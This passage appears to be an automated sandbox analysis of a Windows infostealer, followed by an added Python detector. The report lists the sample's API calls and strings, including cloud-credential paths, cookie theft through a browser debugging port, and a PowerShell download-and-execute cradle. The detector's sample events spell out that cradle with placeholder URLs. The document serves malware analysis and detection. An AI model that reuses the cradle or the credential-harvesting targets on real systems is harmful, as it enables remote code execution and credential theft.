                                  • lstrcat.KERNEL32(?,\.aws\), ref: 0031E886
                                  • memset.MSVCRT ref: 0031E8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0031E8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E920
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0031E947
                                  • memset.MSVCRT ref: 0031E986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: 35e7fb4ab7f949e96bf7a7ee0eb79cae71a41e22787269d887e74153d55a9201
                                  • Instruction ID: 698f84f5739766e8fff84faf213264bbece7daad20461924aefb6c83a6a11fd0
                                  • Opcode Fuzzy Hash: 35e7fb4ab7f949e96bf7a7ee0eb79cae71a41e22787269d887e74153d55a9201
                                  • Instruction Fuzzy Hash: C371C971E50219ABDB27EB64DC4AFED7774AF58700F040494B6199F1C1DFB0AA888B54
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 0031ABCF
                                  • lstrlen.KERNEL32(0102DCB8), ref: 0031ABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031AC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031AC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ACB7
                                  • lstrlen.KERNEL32(00334AD4), ref: 0031ACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ACF3
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 0031ACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AD28
                                  • lstrlen.KERNEL32(00334AD4), ref: 0031AD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AD5C
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 0031AD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AD91
                                  • lstrlen.KERNEL32(0102DDD8), ref: 0031ADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031ADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031AE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031AE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AE6F
                                  • lstrlen.KERNEL32(00000000), ref: 0031AE85
                                  • lstrcpy.KERNEL32(00000000,0102DE80), ref: 0031AEB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: 2f54264918e2ebe04ed4c01eaa2cb7d5d4e6bc2f4d14b0de1830a489985bb097
                                  • Instruction ID: 9630ad1ab3b0f52d901bd88bdec74a411214e96cb36ddb9d782fca092f0ac6f6
                                  • Opcode Fuzzy Hash: 2f54264918e2ebe04ed4c01eaa2cb7d5d4e6bc2f4d14b0de1830a489985bb097
                                  • Instruction Fuzzy Hash: B5B17E70A12A169BCB27EBA8DC5CAAFB3B5AF04302F050424F805DB291DF74DD59DB91
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,003172A4), ref: 003247E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 003247FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0032480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0032481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 0032482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00324840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00324851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00324862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00324873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00324884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00324895
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: 24941ef4c19b61159d2b96b0e811adf6122e6dbfe38007d3233489c89ac0f7c9
                                  • Instruction ID: 251d20b777fa496728f6e55989f5baedef7d8f045d272dd95cbd2117af921221
                                  • Opcode Fuzzy Hash: 24941ef4c19b61159d2b96b0e811adf6122e6dbfe38007d3233489c89ac0f7c9
                                  • Instruction Fuzzy Hash: 8311DEB5D52720AFCB19DFB5AD4DAA63ABCBA29706704081AF151D2360DBF4400CFF50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031BE53
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031BE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0031BE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031BEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0031BEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031BEEB
                                  • lstrlen.KERNEL32(')"), ref: 0031BEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 0031BF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0031BF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031BF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0031BF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 0031C00C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: 14be1c294033f4bff0d71056b17b63728d088d6d82c414417f91d13e27624473
                                  • Instruction ID: 47cfb5cd68da93f870bbceb32f06a408907f57978dd9ff844375d1dd877a59a4
                                  • Opcode Fuzzy Hash: 14be1c294033f4bff0d71056b17b63728d088d6d82c414417f91d13e27624473
                                  • Instruction Fuzzy Hash: 7F61C871E112169BCB27AFB99C8D6EFBBB8AF18300F051425F405E7251DF34D9568B90
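The function above concatenates the three string fragments listed in its String ID (the `-nop -c "iex(New-Object Net.WebClient).DownloadString('` prefix, a URL the report does not show, and the `')"` suffix), prepends the WOW64 PowerShell path, and hands the result to ShellExecuteEx: a PowerShell download-and-execute cradle. What follows is an added detection example, not part of the Joe Sandbox report or of the sample's code. It runs over constructed process-creation events and flags command lines that carry this cradle; the event records, the `example.invalid` URLs and the EXPECTED_PARENTS set are assumptions made for illustration and should be tuned to the telemetry and environment at hand.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches the cradle the sample assembles from its three string fragments:
#   -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
# Whitespace and case are tolerated; "System.Net.WebClient" is accepted as well.
CRADLE_RE = re.compile(
    r"iex\s*\(\s*New-Object\s+(?:System\.)?Net\.WebClient\s*\)\s*\.\s*DownloadString"
    r"\s*\(\s*['\"](?P<url>[^'\"]+)['\"]\s*\)",
    re.IGNORECASE,
)
NOPROFILE_RE = re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.IGNORECASE)  # -nop / -NoProfile
COMMAND_RE = re.compile(r"(?:^|\s)-c(?:ommand)?\b", re.IGNORECASE)       # -c / -Command

# Assumed set of parents that normally spawn powershell.exe; tune per environment.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe"}


@dataclass
class Finding:
    parent: str
    image: str
    url: str
    flags: List[str]


def find_cradle(cmdline: str) -> Optional[str]:
    """Return the URL passed to DownloadString if the command line carries the cradle."""
    m = CRADLE_RE.search(cmdline)
    return m.group("url") if m else None


def score_event(event: dict) -> Optional[Finding]:
    """Flag a process-creation event that runs the cradle and attach context flags."""
    url = find_cradle(event["cmdline"])
    if url is None:
        return None
    flags = []
    if NOPROFILE_RE.search(event["cmdline"]):
        flags.append("no_profile")        # -nop: profile scripts skipped, typical of cradles
    if COMMAND_RE.search(event["cmdline"]):
        flags.append("inline_command")    # -c: the script body lives in the command line
    if "\\syswow64\\" in event["image"].lower():
        flags.append("wow64_powershell")  # 32-bit PowerShell, as the sample's path selects
    if event["parent"].lower() not in EXPECTED_PARENTS:
        flags.append("unusual_parent")
    return Finding(event["parent"], event["image"], url, flags)


def scan(events: List[dict]) -> List[Finding]:
    """Return a Finding for every event whose command line carries the cradle."""
    return [f for f in (score_event(e) for e in events) if f is not None]


# Constructed sample events (not taken from the report). The first mimics the command
# line this function builds; the URL is a placeholder because the report does not show it.
SAMPLE_EVENTS = [
    {
        "parent": "file.exe",
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "
                   "\"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\"",
    },
    {   # benign: an administrator running a script file
        "parent": "explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # the same cradle with different casing and spacing, spawned by an Office process
        "parent": "winword.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -NoP -C \"IEX (New-Object Net.WebClient).DownloadString( 'https://example.invalid/a' )\"",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.parent} -> {f.image}: fetches {f.url} [{', '.join(f.flags)}]")
```

The regex keys on the WebClient/DownloadString/iex combination rather than on the exact bytes the sample uses, so trivial respacing or recasing of the same cradle still matches; the flags are there to rank hits, since `-nop -c` plus an unexpected parent is a much stronger signal than the cradle string alone.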
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0032184F
                                  • lstrlen.KERNEL32(01016108), ref: 00321860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003218C1
                                  • lstrlen.KERNEL32(00334FA0), ref: 003218D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003218F4
                                  • lstrcat.KERNEL32(00000000,00334FA0), ref: 00321900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032192F
                                  • lstrlen.KERNEL32(01016118), ref: 00321945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003219A6
                                  • lstrlen.KERNEL32(00334FA0), ref: 003219B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003219D9
                                  • lstrcat.KERNEL32(00000000,00334FA0), ref: 003219E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321A14
                                  • lstrlen.KERNEL32(01016128), ref: 00321A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321A8B
                                  • lstrlen.KERNEL32(01016148), ref: 00321AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: d3f32509c7a0e3f82969393272136142023d2f24a8ce4deea36f9c81cf3d373b
                                  • Instruction ID: 2cdd98327aa5346b846b58712429664a83448b631aa74ddb357fc87ce9ee6bf6
                                  • Opcode Fuzzy Hash: d3f32509c7a0e3f82969393272136142023d2f24a8ce4deea36f9c81cf3d373b
                                  • Instruction Fuzzy Hash: C49130B16017139FDB229FB9ED98A27B7E8AF24300F154828B886D7391DF74E845DB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003147C5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314812
                                  • lstrlen.KERNEL32(00334B60), ref: 0031481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031483A
                                  • lstrcat.KERNEL32(00000000,00334B60), ref: 00314846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003148A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003148CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 003148DC
                                  • lstrlen.KERNEL32(?), ref: 003148F0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003149B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003149E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314A5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: b0170524de267e662824edaa78f3db8a4f8cdbbb238f40b4bf7a3e520341e5d0
                                  • Instruction ID: c0795231da9ab771dac0e570fecbfbbf340b4712ba2eb6a34b08568a6da98542
                                  • Opcode Fuzzy Hash: b0170524de267e662824edaa78f3db8a4f8cdbbb238f40b4bf7a3e520341e5d0
                                  • Instruction Fuzzy Hash: E7B1B371A112069BCB27EF78D9999AF77B9AF54300F054428F845AB351DF30EC598B90
                                  APIs
                                    • Part of subcall function 003090C0: InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 003090DF
                                    • Part of subcall function 003090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003090FC
                                    • Part of subcall function 003090C0: InternetCloseHandle.WININET(00000000), ref: 00309109
                                  • strlen.MSVCRT ref: 003092E1
                                  • strlen.MSVCRT ref: 003092FA
                                    • Part of subcall function 00308980: std::_Xinvalid_argument.LIBCPMT ref: 00308996
                                  • strlen.MSVCRT ref: 00309399
                                  • strlen.MSVCRT ref: 003093E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 00309547
                                  • lstrcat.KERNEL32(?,00331794), ref: 00309559
                                  • lstrcat.KERNEL32(?,?), ref: 0030956A
                                  • lstrcat.KERNEL32(?,00334B98), ref: 0030957C
                                  • lstrcat.KERNEL32(?,?), ref: 0030958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 0030959F
                                  • lstrlen.KERNEL32(?), ref: 003095B6
                                  • lstrlen.KERNEL32(?), ref: 003095DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00309614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: 1e498a5d99efa4ae4e1b84e897ec1115347e81465c528e41f34166e9a33e171e
